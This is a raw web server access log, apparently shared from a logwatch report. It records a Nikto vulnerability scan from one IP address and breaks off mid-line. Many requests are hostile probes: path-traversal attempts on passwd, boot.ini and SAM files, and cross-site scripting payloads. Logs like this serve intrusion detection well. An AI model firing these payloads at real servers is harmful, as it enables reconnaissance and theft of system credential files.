logwatch

212.92.77.254 - - [24/Jul/2003:01:31:16 +0900] "GET / HTTP/1.1" 200 3923 "-" "libwhisker/1.6" 212.92.77.254 - - [24/Jul/2003:01:31:17 +0900] "GET /Nikto-1.30-nexWS82JrkAwEdao7u.htm HTTP/1.1" 404 317 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:31:17 +0900] "GET / HTTP/1.1" 200 3923 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:31:18 +0900] "GET /cgi.cgi/ HTTP/1.1" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:31:19 +0900] "GET /webcgi/ HTTP/1.1" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:31:20 +0900] "GET /cgi-914/ HTTP/1.1" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:31:21 +0900] "GET /cgi-915/ HTTP/1.1" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:31:21 +0900] "GET /bin/ HTTP/1.1" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:31:22 +0900] "GET /cgi/ HTTP/1.1" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:31:23 +0900] "GET /mpcgi/ HTTP/1.1" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:31:24 +0900] "GET /cgi-bin/ HTTP/1.1" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:31:25 +0900] "GET /cgi-sys/ HTTP/1.1" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:31:26 +0900] "GET /cgi-local/ HTTP/1.1" 404 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:31:27 +0900] "GET /htbin/ HTTP/1.1" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:31:27 +0900] "GET /cgibin/ HTTP/1.1" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:31:28 +0900] "GET /cgis/ HTTP/1.1" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:31:29 +0900] "GET /scripts/ HTTP/1.1" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:31:30 +0900] "GET /cgi-win/ HTTP/1.1" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:31:30 +0900] "GET /fcgi-bin/ HTTP/1.1" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:31:33 +0900] "GET / HTTP/1.1" 200 3923 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:31:34 +0900] "GET /junk.php HTTP/1.1" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:31:35 +0900] "GET / HTTP/1.0" 200 3923 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:31:36 +0900] "GET /robots.txt HTTP/1.0" 200 187 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:31:36 +0900] "OPTIONS / HTTP/1.0" 200 - "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:31:38 +0900] "GET /~root HTTP/1.0" 404 277 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:31:39 +0900] "GET /.DS_Store HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:31:39 +0900] "GET /.FBCIndex HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:31:40 +0900] "OPTIONS // HTTP/1.0" 200 - "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:31:41 +0900] "GET /666%0a%0a<script>alert('Vulnerable');</script>666.jsp HTTP/1.0" 404 333 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:31:41 +0900] "GET /?D=A HTTP/1.0" 200 3923 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:31:42 +0900] "GET /?M=A HTTP/1.0" 200 3923 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:31:44 +0900] "GET /?N=D HTTP/1.0" 200 3923 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:31:45 +0900] "GET /?S=A HTTP/1.0" 200 3923 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:31:46 +0900] "GET /admin.cgi HTTP/1.0" 403 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:31:46 +0900] "GET /blah-whatever.jsp HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:31:47 +0900] "GET /cgi-bin/main_menu.pl HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:31:48 +0900] "GET /cgi-bin/printenv HTTP/1.0" 200 770 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:31:49 +0900] "GET /cgi-bin/printenv HTTP/1.0" 200 770 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:31:49 +0900] "GET /cgi-bin/search HTTP/1.0" 404 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:00 +0900] "GET /cgi-bin/test-cgi HTTP/1.0" 403 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:01 +0900] "GET /content/base/build/explorer/none.php?..:..:..:..:..:..:..:etc:passwd: HTTP/1.0" 404 308 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:02 +0900] "GET /content/base/build/explorer/none.php?/etc/passwd HTTP/1.0" 404 308 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:02 +0900] "GET /doc/rt/overview-summary.html HTTP/1.0" 404 300 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:03 +0900] "GET /docs/ HTTP/1.0" 404 277 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:04 +0900] "GET /docs/sdb/en/html/index.html HTTP/1.0" 404 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:04 +0900] "GET /error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini HTTP/1.0" 404 306 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:05 +0900] "GET /error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini HTTP/1.0" 404 304 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:06 +0900] "GET /error/HTTP_NOT_FOUND.html.var HTTP/1.0" 404 301 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:07 +0900] "GET /examples/ HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:07 +0900] "GET /examples/jsp/index.html HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:08 +0900] "GET /examples/jsp/snp/snoop.jsp HTTP/1.0" 404 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:09 +0900] "GET /examples/jsp/source.jsp?? HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:09 +0900] "GET /examples/servlet/AUX HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:10 +0900] "GET /examples/servlet/TroubleShooter HTTP/1.0" 404 303 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:11 +0900] "GET /examples/servlets/index.html HTTP/1.0" 404 300 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:12 +0900] "GET /icons/ HTTP/1.0" 200 18551 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:13 +0900] "GET /index.html.ca HTTP/1.0" 404 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:14 +0900] "GET /index.html.cz.iso8859-2 HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:15 +0900] "GET /index.html.de HTTP/1.0" 404 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:15 +0900] "GET /index.html.dk HTTP/1.0" 404 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:16 +0900] "GET /index.html.ee HTTP/1.0" 404 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:17 +0900] "GET /index.html.el HTTP/1.0" 404 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:17 +0900] "GET /index.html.en HTTP/1.0" 404 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:18 +0900] "GET /index.html.es HTTP/1.0" 404 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:19 +0900] "GET /index.html.et HTTP/1.0" 404 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:20 +0900] "GET /index.html.fr HTTP/1.0" 404 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:20 +0900] "GET /index.html.he.iso8859-8 HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:21 +0900] "GET /index.html.hr.iso8859-2 HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:22 +0900] "GET /index.html.it HTTP/1.0" 404 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:22 +0900] "GET /index.html.ja.iso2022-jp HTTP/1.0" 404 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:23 +0900] "GET /index.html.kr.iso2022-kr HTTP/1.0" 404 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:24 +0900] "GET /index.html.ltz.utf8 HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:25 +0900] "GET /index.html.lu.utf8 HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:25 +0900] "GET /index.html.nl HTTP/1.0" 404 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:26 +0900] "GET /index.html.nn HTTP/1.0" 404 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:27 +0900] "GET /index.html.no HTTP/1.0" 404 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:27 +0900] "GET /index.html.po.iso8859-2 HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:28 +0900] "GET /index.html.pt HTTP/1.0" 404 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:29 +0900] "GET /index.html.pt-br HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:30 +0900] "GET /index.html.ru.cp-1251 HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:30 +0900] "GET /index.html.ru.cp866 HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:31 +0900] "GET /index.html.ru.iso-ru HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:32 +0900] "GET /index.html.ru.koi8-r HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:33 +0900] "GET /index.html.ru.utf8 HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:33 +0900] "GET /index.html.se HTTP/1.0" 404 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:34 +0900] "GET /index.html.tw HTTP/1.0" 404 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:35 +0900] "GET /index.html.tw.Big5 HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:35 +0900] "GET /index.html.var HTTP/1.0" 404 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:36 +0900] "GET /interscan/ HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:37 +0900] "GET /jservdocs/ HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:38 +0900] "GET /lpt9 HTTP/1.0" 404 276 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:38 +0900] "GET /manual/images/ HTTP/1.0" 200 1796 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:39 +0900] "GET /NetDetector/middle_help_intro.htm HTTP/1.0" 404 305 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:40 +0900] "GET /oem_webstage/cgi-bin/oemapp_cgi HTTP/1.0" 404 303 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:40 +0900] "GET /oem_webstage/oem.conf HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:41 +0900] "GET /php/php.exe?c:\\boot.ini HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:42 +0900] "GET /pls/admin HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:43 +0900] "GET /server-info HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:43 +0900] "GET /server-status HTTP/1.0" 404 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:44 +0900] "GET /servlet/org.apache.catalina.ContainerServlet/<script>alert('Vulnerable')</script> HTTP/1.0" 404 365 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:45 +0900] "GET /servlet/org.apache.catalina.Context/<script>alert('Vulnerable')</script> HTTP/1.0" 404 356 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:45 +0900] "GET /servlet/org.apache.catalina.Globals/<script>alert('Vulnerable')</script> HTTP/1.0" 404 356 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:46 +0900] "GET /servlet/org.apache.catalina.servlets.WebdavStatus/<script>alert('Vulnerable')</script> HTTP/1.0" 404 370 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:47 +0900] "GET /servlets/MsgPage?action=badlogin&msg=<script>alert('Vulnerable')</script> HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:48 +0900] "GET /site/eg/source.asp HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:48 +0900] "GET /soap/servlet/soaprouter HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:49 +0900] "GET /soapConfig.xml HTTP/1.0" 404 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:50 +0900] "GET /stronghold-info HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:50 +0900] "GET /stronghold-status HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:51 +0900] "GET /test HTTP/1.0" 404 276 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:52 +0900] "GET /test.php HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:53 +0900] "GET /test/jsp/buffer1.jsp HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:53 +0900] "GET /test/jsp/buffer2.jsp HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:54 +0900] "GET /test/jsp/buffer3.jsp HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:55 +0900] "GET /test/jsp/buffer4.jsp HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:55 +0900] "GET /test/jsp/declaration/IntegerOverflow.jsp HTTP/1.0" 404 312 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:56 +0900] "GET /test/jsp/extends1.jsp HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:57 +0900] "GET /test/jsp/extends2.jsp HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:58 +0900] "GET /test/jsp/Language.jsp HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:58 +0900] "GET /test/jsp/pageAutoFlush.jsp HTTP/1.0" 404 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:32:59 +0900] "GET /test/jsp/pageDouble.jsp HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:00 +0900] "GET /test/jsp/pageExtends.jsp HTTP/1.0" 404 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:01 +0900] "GET /test/jsp/pageImport2.jsp HTTP/1.0" 404 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:01 +0900] "GET /test/jsp/pageInfo.jsp HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:02 +0900] "GET /test/jsp/pageInvalid.jsp HTTP/1.0" 404 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:03 +0900] "GET /test/jsp/pageIsErrorPage.jsp HTTP/1.0" 404 300 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:03 +0900] "GET /test/jsp/pageIsThreadSafe.jsp HTTP/1.0" 404 301 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:04 +0900] "GET /test/jsp/pageSession.jsp HTTP/1.0" 404 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:05 +0900] "GET /test/realPath.jsp HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:06 +0900] "GET /tomcat-docs/index.html HTTP/1.0" 404 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:06 +0900] "GET /XSQLConfig.xml HTTP/1.0" 404 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:07 +0900] "GET /~nobody/etc/passwd HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:08 +0900] "GET /cgi.cgi/.htaccess HTTP/1.0" 403 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:08 +0900] "GET /cgi-bin/.htaccess HTTP/1.0" 403 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:09 +0900] "GET /cgi.cgi/test-cgi.bat HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:10 +0900] "GET /cgi-bin/test-cgi.bat HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:11 +0900] "TRACE / HTTP/1.0" 200 103 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:11 +0900] "TRACK / HTTP/1.0" 501 330 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:12 +0900] "GET /%00 HTTP/1.0" 404 272 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:13 +0900] "GET /%00/ HTTP/1.0" 404 272 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:13 +0900] "GET /%0a%0a<script>alert(\\\"Vulnerable\\\")</script>.jsp HTTP/1.0" 404 328 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:14 +0900] "GET /%22%3cscript%3ealert(%22xss%22)%3c/script%3e HTTP/1.0" 404 314 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:15 +0900] "GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.0" 400 393 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:16 +0900] "GET /%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini HTTP/1.0" 400 384 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:16 +0900] "GET /%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e HTTP/1.0" 404 323 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:17 +0900] "GET /%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e HTTP/1.0" 404 327 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:18 +0900] "GET /%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html HTTP/1.0" 404 324 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:18 +0900] "GET /%3f.jsp HTTP/1.0" 404 277 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:19 +0900] "GET /%3f.jsp HTTP/1.0" 404 277 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:20 +0900] "GET /&lt;script&gt;alert('Vulnerable');&lt;/script&gt; HTTP/1.0" 404 337 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:21 +0900] "GET /.%252e/.%252e/.%252e/winnt/boot.ini HTTP/1.0" 404 301 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:21 +0900] "GET /..%252f..%252f..%252f..%252f..%252f../windows/repair/sam HTTP/1.0" 404 318 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:22 +0900] "GET /..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam HTTP/1.0" 404 316 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:23 +0900] "GET /..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._ HTTP/1.0" 404 318 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:23 +0900] "GET /..%255c..%255c..%255c..%255c..%255c../windows/repair/sam HTTP/1.0" 404 318 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:24 +0900] "GET /..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam HTTP/1.0" 404 316 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:25 +0900] "GET /..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._ HTTP/1.0" 404 318 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:26 +0900] "GET /..%2F..%2F..%2F..%2F..%2F../windows/repair/sam HTTP/1.0" 404 308 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:26 +0900] "GET /..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam HTTP/1.0" 404 306 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:27 +0900] "GET /..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._ HTTP/1.0" 404 308 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:28 +0900] "GET /................../etc/passwd HTTP/1.0" 404 301 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:28 +0900] "GET /.../.../.../.../.../.../.../.../.../boot.ini HTTP/1.0" 404 316 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:29 +0900] "GET /../../../../../../../../../../etc/passwd HTTP/1.0" 400 374 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:30 +0900] "GET /../webserver.ini HTTP/1.0" 400 350 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:31 +0900] "GET /..\\..\\..\\..\\..\\..\\temp\\temp.class HTTP/1.0" 404 305 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:31 +0900] "GET /./ HTTP/1.0" 200 3923 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:32 +0900] "GET /.access HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:33 +0900] "GET /.addressbook HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:34 +0900] "GET /.bashrc HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:35 +0900] "GET /.bash_history HTTP/1.0" 404 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - 